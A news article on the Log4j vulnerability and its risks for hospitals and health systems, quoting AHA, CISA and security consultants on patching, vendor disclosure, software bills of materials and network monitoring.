Hospital and health system executives should assess the software they're using and monitor their networks as businesses across the U.S. grapple with a recently discovered cybersecurity vulnerability found in enterprise applications and cloud services, experts say.
"What makes this vulnerability so dangerous is the fact that it is ubiquitous," said John Riggi, senior adviser for cybersecurity and risk at the American Hospital Association, of the Log4j vulnerability. "It's third-party software that's embedded in other devices or programs, which has wide-spread use across all sectors—including healthcare."
The flaw is found in a widely used open-source piece of software known as Log4j, a logging framework that records activities that take place in an application, often to log performance and security information. It's used in Java, a popular programming language that underpins many software programs.
Hackers could exploit the vulnerability to remotely send a command to a system using the software and subsequently take control of the system. From there, a hacker could potentially to exfiltrate patient data or deploy ransomware.
The vulnerability is already being "widely exploited by a growing set of threat actors," said Jen Easterly, director of the Homeland Security Department's Cybersecurity and Infrastructure Security Agency, in a statement posted online this weekend. "To be clear, this vulnerability poses a severe risk."
CISA is working with public- and private-sector partners, including the Federal Bureau of Investigation and the National Security Agency.
The volunteer not-for-profit group that develops the software, Apache Software Foundation, has released upgraded Log4j versions that addresses the vulnerability, which in some cases organizations may be able to update on their own.
But organizations using software with the vulnerability mainly will be reliant on vendors to identify and patch their products, Easterly said. She said organizations should identify all external-facing devices that have Log4j installed and ensure their security team is updating those devices as vendors make fixes available.
She urged vendors to inform customers about whether products contain the Log4j vulnerability.
The Log4j logging framework has been used for years, said Bryan Orme, a principal at cybersecurity consulting firm GuidePoint Security.
"A lot of modern application architectures have been built on top of it," Orme said.
The vulnerability has affected many cloud companies.
Amazon's cloud arm released a list of services affected by the vulnerability and whether they've been updated. IBM said it's "actively responding" to the vulnerability, investigating products and services that could be exploited and sharing a running list of products it determines aren't effected by the bug.
VMware has said the vulnerability affects multiple products for which it's working on patches.
This scenario is an example of why the AHA has pressed the federal government to require medical devicemakers to disclose a "software bill of materials" for their products, Riggi said.
The Food and Drug Administration in 2018 released a draft of pre-market guidance for managing cybersecurity in medical devices, which included asking developers of internet-connected medical devices to provide customers with a bill of materials, or rundown of commercial and off-the-shelf technologies in the device. That could help customers assess whether a product is susceptible to vulnerabilities.
The FDA hasn't released final guidance.
"One of the biggest challenges we have is just trying to understand what devices and what technologies incorporate this software," Riggi said. "Hospitals and health systems right now are scrambling to identify how they might be exposed to this vulnerability and are making tremendous efforts to patch."
"Of course, that can be quite the distraction for our hospitals and health systems right now, especially as they're facing a surge of COVID-19 and flu patients," he added.
Even after applications are patched and updated, it's important to monitor the network for unexpected activity, in case the organization's environment has already been compromised, said Mac McMillan, CEO of cybersecurity consulting firm CynergisTek. The Log4j vulnerability was disclosed late last week, but hackers had reportedly been trying to exploit it since earlier in December, he said.
"There's a period of time there where somebody could have taken advantage of this vulnerability … and infiltrated [an organization's] system without them knowing it," McMillan said.
